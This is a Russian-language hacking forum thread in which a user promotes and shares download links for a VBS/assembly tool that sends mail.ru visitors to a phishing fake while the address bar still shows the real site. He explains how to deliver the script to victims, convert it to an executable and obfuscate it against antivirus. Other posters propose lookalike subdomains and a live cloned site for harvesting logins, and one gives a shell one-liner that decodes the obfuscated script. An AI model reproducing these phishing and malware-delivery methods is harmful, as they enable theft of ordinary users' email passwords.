ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Фишинг mail.ru Смена URL в адресной строке браузера (https://forum.antichat.xyz/showthread.php?t=8066391)

MOV_EAX 09.11.2013 01:00

качаем сам скрипт тест

вырубить скрипт можете в Диспетчере задач.

MOV_EAX 09.11.2013 01:00

Фишинг mail.ru Смена URL в адресной строке браузера (для Ваших фейков)
Как можно изменить URL в адресной строке браузера с помощью скрипта смотрите видео

Автор в Теме.
заинтересовало? ася на скрине.

MOV_EAX 09.11.2013 01:00

обратите внимание на браузерную строку Url при заходе на mail.ru скрипт делает редирект на ---- > http://hpc.name/thread/32344/p9.html

после как попадаем на http://hpc.name/thread/32344/p9.html у нас снова в браузерной строке Url появляется mail.ru

то есть если жертва зашла на оригинальную страницу mail.ru её перекинет на на Ваш фейк но останется при этом строка Url оригинальной страницы mail.ru смотрите далее.

__________________________________________________ ___________________________________________

оставляйте Ваши отзывы .

kaleka444 02.12.2013 01:00

нихрена не понял))
судя по идео, ты (жертва). Ищешь майл с помощью браузера. КАК ТАК?

bytil85 02.12.2013 01:00

Тема для купле продажи а не для етого подфорума

mavrodij 02.12.2013 01:00

Думал что-то серьезное. Написал даже декодер этой криптовки. Ерунда.

MOV_EAX 02.12.2013 01:00

нет совсем не так kaleka444

1.заливаешь свой фейк для маил.ру на свой хостинг .
2.кидаешь жертве файл vbs script который я тебе дам ,который и будет менять в адресной строке браузера саму страницу URL у жертвы допустим при переходе на маил.ру скрипт закинет жертву на твой фейк и к тому же покажет в адресной строке оригинальную страницу маил.ру ,а не страницу твоего фейка ,смысл в том что мы тут прячем свою ссылку на наш фейк и к тому же мало подозрений того что жертва заглянет вдруг на строку браузера ,а там увидит то что действительно она то есть жертва зашла на оригинальную страницу маил.ру и возможно без проблем отдаст Вам пароли .
3.Vbs script конечно можно с конвертировать в .ехе файл и.т.д это Ваша фантазия.

4. сделаю 5 чел с этого форума бесплатно + криптовка скрипта , с Вас ваша ссылка на Ваш фейк ,аська на скрине , bytil85 прав тему конечно можно и перенести .

ZoRKeG 02.12.2013 01:00

лол, "криптовать" свой скрипт нужно было лучше, а то пришел zor и спер у тебя скрипт... Правда, кривоватый он, ну да ладно, идея понятна.
P.S. Дампать в паблик не буду (-;

Gelonavi 02.12.2013 01:00

Я просто оставлю это здесь

code:

r=`cat fejk.vbs | sed -e 's;[a-Z];;g' | tr " " "\n" | sed -e 's;^.$;;g;/^$/d'`; k=`for i in $r; do perl -e "print $i"; echo -e "\n"; done`; for i in $k; do printf \\$(printf '%03o' $i) | iconv -f windows-1251 -t utf-8; done

mr.borocco 03.12.2013 01:00

Ща посмотрим))

mr.borocco 03.12.2013 01:00

Бесполезная вещь)

1) Надо закинуть жертве файл. уж лучше закинуть что нибудь стоящее чем, скрипт который подменить адресную строку)
2) Чтобы жертва не видела адрес фейка, используйте поддомены e.mail.ru.cgi-bin.ru например)

kaleka444 03.12.2013 01:00

Цитата:

Сообщение от mr.borocco

Бесполезная вещь)

1) Надо закинуть жертве файл. уж лучше закинуть что нибудь стоящее чем, скрипт который подменить адресную строку)
2) Чтобы жертва не видела адрес фейка, используйте поддомены e.mail.ru.cgi-bin.ru например)

Я так же думаю))
короче так: ПРИМЕР

Есть сайт http://balabol.biz/
Я купил домен http://balabol.biz.az/

Товарищ мой сделал для меня скрипт который (каким то образом) копирует весь сайт balabol.biz

В итоге я имею сайт http://balabol.biz.az/,, полную копию оригинала который копирует оригинал в реальном времени.
Единственный минус((
Есть проблемы с авторизацией на фейке, когда получается авторизоваться а когда нет!! Что то с куками надо разбираться.
Проще говоря жертва вводит данные на фейке и его авторизует как на настоящем сайте

MOV_EAX 13.12.2013 01:00

Цитата:

Сообщение от kaleka444

Я так же думаю))
короче так: ПРИМЕР

Есть сайт http://balabol.biz/
Я купил домен http://balabol.biz.az/

Товарищ мой сделал для меня скрипт который (каким то образом) копирует весь сайт balabol.biz

В итоге я имею сайт http://balabol.biz.az/,, полную копию оригинала который копирует оригинал в реальном времени.
Единственный минус((
Есть проблемы с авторизацией на фейке, когда получается авторизоваться а когда нет!! Что то с куками надо разбираться.
Проще говоря жертва вводит данные на фейке и его авторизует как на настоящем сайте

ну понятно на вкус и цвет товарища нет ,кто любит дыню, а кто арбуз, о вкусах не спорят ты знал об этом?

написал Программу на асме и часть кода на vbs ,прога несёт имя rabbitто есть заяц ,кратко:прога меняет адресную строку браузера в УРЛ допустим Вы скинули жертве
(файл-фейк rabbit.scr) через некоторое время до пустим через два три часа жертва решила авторизоваться на маил.ру ,и Человек когда будет в строке вводит слово mail.ru его скинет на Ваш фейк но в адресной строке браузера останется оригинальная страница http://mail.ru
кому нужно стучитесь за прогой в аську ,раздача до конца этого года Автор проги в теме,
описание и.т.д по аське

скрин клац
IMAGE http://img.pixs.ru/storage/2/5/8/rjpg_3806710_10076258.jpg

MOV_EAX 17.12.2013 01:00

раздача продолжается пока палится одним антивирусом ,UP.

DOWNLOAD

IMAGE http://img.pixs.ru/storage/2/5/8/rjpg_3806710_10076258.jpg

pass: 123

MOV_EAX 27.01.2014 01:00

исправлены баги ,описание и сама прога внутри архива .
Rabbit v1.0
IMAGE http://i7.pixs.ru/storage/7/3/9/rabbit1bmp_9519954_10628739.jpg

пройти по ссылке и загрузить http://zalil.ru/34935895 Rabbit v1.0

http://www.securitylab.ru/forum/mess...#message414687

labvictx 11.09.2014 01:00

Цитата:

Сообщение от MOV_EAX

исправлены баги ,описание и сама прога внутри архива .
Rabbit v1.0
IMAGE http://i7.pixs.ru/storage/7/3/9/rabbit1bmp_9519954_10628739.jpg

пройти по ссылке и загрузить http://zalil.ru/34935895 Rabbit v1.0

http://www.securitylab.ru/forum/mess...#message414687

Сервер не найден
Браузер не может найти сервер zalil.ru.
Плиз, перезалейте

MOV_EAX 26.11.2014 01:00

вставляем в нашу прогу адрес урл касс.ру запускаем наш файл по фишингу ,после перeходим на майл.ру но у нас после перехода на майл.ру все же перекидывает на касс.ру но в адресной строке браусера остается майл.ру, и не каких подозрений.

значит просто касс.ру <----- будто наш фейк
вогнали ?

ссылка на видео
Файл № 42377545 подтвержден
Название: f.rar
Размер: 20.45 Мб
Доступен до: 2014-12-26 13:34:54
Ссылка для скачивания файла: http://zalil-slil.rusfolder.net/files/42377545

MOV_EAX 03.01.2015 01:00

Дополнительное объяснение:читать в readme.txt обязательно.

обновление проги: Ссылка на страницу загрузки:
http://my-files.ru/z8pdk7

PHP highlight

Код:


       
Код:

       
http://pixs.ru/showimage/spbmp_3556065_15419125.jpg





URL-Spoofing mail.ru v.1.0.1
____________________________
Фишинг mail.ru Смена URL в адресной строке браузера

MOV_EAX 11.01.2015 01:00

URL-Spoofing v.1.5

видео
Доступен до: 2015-02-10 19:44:01
Описание: URL-Spoofing v.1.5
Ссылка для скачивания файла: http://webfiles.ru/files/42723904
IMAGE http://www.bank-of-africa.net/sites/all/themes/boa_grp/logo.png

подмена всех урл адресов

+ вставляем нужный нам содержимое мета тег
+ ссылку на Ваш фейк
+ урл адрес оригинальной страницы

и кидаем файл жертве.
видео нa rutube часть 2
http://rutube.ru/video/a215aec5716cc...45f5ee04a5cae/

noolname 18.03.2015 01:00

Почему страница ввода пароля, не похожа на мейл.ру? Или это только на видео так?

evropa 26.05.2015 01:00

СКАЧАТЬ!!!ПОШАГОВОЕ РУКОВОДСТВО В КАРТИНКАХ!!!

wera87df 27.05.2015 01:00

Цитата:

Сообщение от evropa

СКАЧАТЬ!!!ПОШАГОВОЕ РУКОВОДСТВО В КАРТИНКАХ!!!

Ай лошара , ай молодца )))

IMAGE http://s011.radikal.ru/i318/1505/ec/2f5e793a4bdc.jpg

IMAGE http://s017.radikal.ru/i429/1505/0e/1ea162ef3963.jpg


Время: 01:19